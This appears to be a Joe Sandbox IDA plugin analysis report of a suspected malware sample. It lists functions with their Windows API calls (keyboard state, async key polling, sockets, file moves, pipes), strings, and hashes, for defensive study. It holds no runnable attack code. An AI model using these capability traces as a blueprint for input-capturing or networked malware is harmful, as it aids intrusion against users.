PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C1B020

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a8891191cc108e4ac12d5943c2f0a61979b7aacb2ad69c1524eef3a7288fec5c
Instruction ID: b1fb1c8d93515f1ec822db7b5add68a817ead89fb22779229450a705432392a4
Opcode Fuzzy Hash: a8891191cc108e4ac12d5943c2f0a61979b7aacb2ad69c1524eef3a7288fec5c
Instruction Fuzzy Hash: 6051E3E06057D53DFB3682748C45BFA7EA95B07304F088489F1E9454D2C3E8AED9E761

Function 00C1ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C1AD19
GetKeyboardState.USER32(?), ref: 00C1AD2E
SetKeyboardState.USER32(?), ref: 00C1AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C1ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C1ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C1AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C1AE38

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 816ccdbd261a7dc85f37f938e78c3ee7452845756964bf8c2ca6394e23c7e798
Instruction ID: 1f0a8ed6ef9f03f332f5b2ef9954dcaa650d02cb6db454f978344b37f0dafa60
Opcode Fuzzy Hash: 816ccdbd261a7dc85f37f938e78c3ee7452845756964bf8c2ca6394e23c7e798
Instruction Fuzzy Hash: FF51D6A1505BD53DFB3692348C95BFA7EA86F47300F088488F1E5468C2C2A4EDD8F752

Function 00BE542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00BF3CD6,?,?,?,?,?,?,?,?,00BE5BA3,?,?,00BF3CD6,?,?), ref: 00BE5470
__fassign.LIBCMT ref: 00BE54EB
__fassign.LIBCMT ref: 00BE5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BF3CD6,00000005,00000000,00000000), ref: 00BE552C
WriteFile.KERNEL32(?,00BF3CD6,00000000,00BE5BA3,00000000,?,?,?,?,?,?,?,?,?,00BE5BA3,?), ref: 00BE554B
WriteFile.KERNEL32(?,?,00000001,00BE5BA3,00000000,?,?,?,?,?,?,?,?,?,00BE5BA3,?), ref: 00BE5584

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: da82b8f8ae95301ccf991dc6c023ae4f06cf8bb37bbdfce9070548a58cbea805
Instruction ID: 6162dfb22294cb8b5aaffc90e5bc6f3b0e24a53d48cc602294292089d955630d
Opcode Fuzzy Hash: da82b8f8ae95301ccf991dc6c023ae4f06cf8bb37bbdfce9070548a58cbea805
Instruction Fuzzy Hash: 7551F471A006899FDB20CFA9D885BEEBBF9EF19304F24409AF555E7291D7309A40CB60

Function 00BC912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BC9141
ScreenToClient.USER32(00000000,?), ref: 00BC915E
GetAsyncKeyState.USER32(00000001), ref: 00BC9183
GetAsyncKeyState.USER32(00000002), ref: 00BC919D

Strings

64000000668955c8b86c000000668945cab96c00000066894dccba2e000000668955ceb864000000668945d0b96c00000066894dd2ba6c000000668955d433c066, xrefs: 00C07152

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: 64000000668955c8b86c000000668945cab96c00000066894dccba2e000000668955ceb864000000668945d0b96c00000066894dd2ba6c000000668955d433c066
API String ID: 4210589936-2606366365
Opcode ID: e1c8af059dc767bb0df118c79b9b479645b626d6fd166fa39523f2f198c8c160
Instruction ID: 0b8427d331f61917756cf31fa209e5759786bd8eaf50d68f1cd5df61ddff2f86
Opcode Fuzzy Hash: e1c8af059dc767bb0df118c79b9b479645b626d6fd166fa39523f2f198c8c160
Instruction Fuzzy Hash: 02416231A0851AFBDF199F64C889BEEB7B4FB05320F244359E429A32E0C7346950DB91

Function 00BD2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BD2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00BD2D53
_ValidateLocalCookies.LIBCMT ref: 00BD2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00BD2E0C
_ValidateLocalCookies.LIBCMT ref: 00BD2E61

Strings

csm, xrefs: 00BD2DF6

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c419d2af95f263ba532b42430ea133035979d89f90bc34cc8eb5bc5755889fbb
Instruction ID: a01c9b027126cf70e3c9ef2939fa97fecea2d500887cb98abfb466010de5021e
Opcode Fuzzy Hash: c419d2af95f263ba532b42430ea133035979d89f90bc34cc8eb5bc5755889fbb
Instruction Fuzzy Hash: 9641B534A002499BCF10DF68C885A9EFBF5FF54354F1481E6E815AB392E7329A15CBD1

Function 00C310B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C3307A
Part of subcall function 00C3304E: _wcslen.LIBCMT ref: 00C3309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C31112
WSAGetLastError.WSOCK32 ref: 00C31121
WSAGetLastError.WSOCK32 ref: 00C311C9
closesocket.WSOCK32(00000000), ref: 00C311F9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 83a9406017701db614ca384e1f0274c143762dceeeab35b1e193ad58c9e1caf4
Instruction ID: 7521c806c990bf5e838fb69f98daa1fb1b3e764acffea580bb258fcee6850c13
Opcode Fuzzy Hash: 83a9406017701db614ca384e1f0274c143762dceeeab35b1e193ad58c9e1caf4
Instruction Fuzzy Hash: B741C135610204AFDB109F14C885BEEBBE9FF45364F188059FD1A9B2A2C774AE41CBA1

Function 00C1CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C1CF22,?), ref: 00C1DDFD

Part of subcall function 00C1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C1CF22,?), ref: 00C1DE16

lstrcmpiW.KERNEL32(?,?), ref: 00C1CF45
MoveFileW.KERNEL32(?,?), ref: 00C1CF7F
_wcslen.LIBCMT ref: 00C1D005
_wcslen.LIBCMT ref: 00C1D01B
SHFileOperationW.SHELL32(?), ref: 00C1D061

Strings

\*.*, xrefs: 00C1CFF3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 215b4fac5fa786e0cb9dcb027ca29b225f5b354832ffa61c40342e4a7e2a846c
Instruction ID: 53deee3223e67f2f647b0e1484e30a06450f109ec8b94702907289dd30d46682
Opcode Fuzzy Hash: 215b4fac5fa786e0cb9dcb027ca29b225f5b354832ffa61c40342e4a7e2a846c
Instruction Fuzzy Hash: 3D4133719452199FDF12EFA4D9C1AEEB7F9AF09380F1000E6E505EB142EB34A789DB50

Function 00C42DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C42E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00C42E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00C42E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C42EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C42EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C42EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C42F0B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e8f2fbc3488d02ad3c1894c74d64f33585c4f5e2237cb295f1241debe254cf9f
Instruction ID: ac2819eed9b3a6e119cdab76613c8ff062d4db27dd0be6ba3465674732e89f10
Opcode Fuzzy Hash: e8f2fbc3488d02ad3c1894c74d64f33585c4f5e2237cb295f1241debe254cf9f
Instruction Fuzzy Hash: E93126346051509FEB20CF58DC86FA937E4FB4A721F990164F9248F2B2CB71AD41EB00

Function 00C17726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C17769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1778F
SysAllocString.OLEAUT32(00000000), ref: 00C17792
SysAllocString.OLEAUT32(?), ref: 00C177B0
SysFreeString.OLEAUT32(?), ref: 00C177B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00C177DE
SysAllocString.OLEAUT32(?), ref: 00C177EC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 37334aaa9a58087d316e884fbf17f88188b0bfc8d06412154872a16bd2e2e60f
Instruction ID: 727df8081d579f7ea56fed87806d58385d0c1dc6fb2b7239f650cc3f4d535049
Opcode Fuzzy Hash: 37334aaa9a58087d316e884fbf17f88188b0bfc8d06412154872a16bd2e2e60f
Instruction Fuzzy Hash: 2921D33A604209AFDB01DFA8CC84EFF73ACFB0A360B008165B915CB1A0D670DD81D7A0

Function 00C177FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C17842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C17868
SysAllocString.OLEAUT32(00000000), ref: 00C1786B
SysAllocString.OLEAUT32 ref: 00C1788C
SysFreeString.OLEAUT32 ref: 00C17895
StringFromGUID2.OLE32(?,?,00000028), ref: 00C178AF
SysAllocString.OLEAUT32(?), ref: 00C178BD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dd8f7e046e7ed6371ac3bcb6ab8e91626464a9e813ed7f813ce7dac8e9fc4c41
Instruction ID: 76dbd48361b07f6f5a9efe56166b992cfe7913a99c4e0dc6efcf655c72952f15
Opcode Fuzzy Hash: dd8f7e046e7ed6371ac3bcb6ab8e91626464a9e813ed7f813ce7dac8e9fc4c41
Instruction Fuzzy Hash: 32218135605105AFEB10AFA8DC88EFA77FCFB0A3607108125B915DB2A1D674DD81DB74

Function 00C204D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C204F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C2052E

Strings

nul, xrefs: 00C20567

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 62f9d49257467d04f487e5307ca0e7a404e4d94c995fc5d7b0d05a3b43b20090
Instruction ID: eb9b7ee3666828e836199bdb1b4f60d1a3d118ae0872a74688514c18fc09b44b
Opcode Fuzzy Hash: 62f9d49257467d04f487e5307ca0e7a404e4d94c995fc5d7b0d05a3b43b20090
Instruction Fuzzy Hash: 372182756003199BDB208F29EC44B9A77F4BF45724F304A2AF8B1D61E2D7B09A40CF64

Function 00C205A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C205C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C20601

Strings

nul, xrefs: 00C20639

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: f40c0262b08fa8e6c10919f7874c759484334dc370db4ca2ff2d2166611ad4c0
Instruction ID: cfecf59dd78d090371166fc32970138286e870706d596eba9e7259a0f2e10418
Opcode Fuzzy Hash: f40c0262b08fa8e6c10919f7874c759484334dc370db4ca2ff2d2166611ad4c0
Instruction Fuzzy Hash: C2214F756003259FDB209F69AC44B9A77E4BF95721F300A1AFCB1E76E2D7B09960CB10

Function 00C440AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB604C
Part of subcall function 00BB600E: GetStockObject.GDI32(00000011), ref: 00BB6060
Part of subcall function 00BB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C44112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C4411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C4412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C44139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C44145

Strings

Msctls_Progress32, xrefs: 00C440E3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3718a4bfeb54fd9a8279adca96acd9811992b79b59f1828027762270dde360db
Instruction ID: ca3b3842702419fe030012ed8ec3cba908d19174934ef0db6f5ca8e5056bff29
Opcode Fuzzy Hash: 3718a4bfeb54fd9a8279adca96acd9811992b79b59f1828027762270dde360db
Instruction Fuzzy Hash: C91193B114011D7EEF119E64CC85EEB7F9DFF09798F114111FA18A2050C6729C21DBA4

Function 00BED7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BED7A3: _free.LIBCMT ref: 00BED7CC

_free.LIBCMT ref: 00BED82D

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BED838
_free.LIBCMT ref: 00BED843
_free.LIBCMT ref: 00BED897
_free.LIBCMT ref: 00BED8A2
_free.LIBCMT ref: 00BED8AD
_free.LIBCMT ref: 00BED8B8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 4059972c3297005db9ef4f86bc082019e39afb7954e83333b41d8a487007714f
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 31113071540B88BAD621BFF2CC47FCB7BDCAF04700F404865B699A6593DBB9B9058760

Function 00C1DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C1DA74
LoadStringW.USER32(00000000), ref: 00C1DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C1DA91
LoadStringW.USER32(00000000), ref: 00C1DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C1DAB9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: cd9fb56ccd183fb8abf1364938d291c68f2fc97ef437a23c49633cbea051a53a
Instruction ID: 5c61e1ad1b58b22836a0d77a5a2221593466d1d52679af608f5ab969022a829a
Opcode Fuzzy Hash: cd9fb56ccd183fb8abf1364938d291c68f2fc97ef437a23c49633cbea051a53a
Instruction Fuzzy Hash: D80162F65002087FE750DBA09DC9FEB366CEB09701F404491B706E2051EA749E845F74

Function 00C2096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00E2E7C8,00E2E7C8), ref: 00C2097B
EnterCriticalSection.KERNEL32(00E2E7A8,00000000), ref: 00C2098D
TerminateThread.KERNEL32(56495244,000001F6), ref: 00C2099B
WaitForSingleObject.KERNEL32(56495244,000003E8), ref: 00C209A9
CloseHandle.KERNEL32(56495244), ref: 00C209B8
InterlockedExchange.KERNEL32(00E2E7C8,000001F6), ref: 00C209C8
LeaveCriticalSection.KERNEL32(00E2E7A8), ref: 00C209CF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 010e2e76766b5b1d7b5df08ee681995b4faa1b2940198850f7a2360b43c4c6d8
Instruction ID: 9deb6116d5c797c6698d7a47d05a7258570750e95d48a9bb9c8513ec524393d9
Opcode Fuzzy Hash: 010e2e76766b5b1d7b5df08ee681995b4faa1b2940198850f7a2360b43c4c6d8
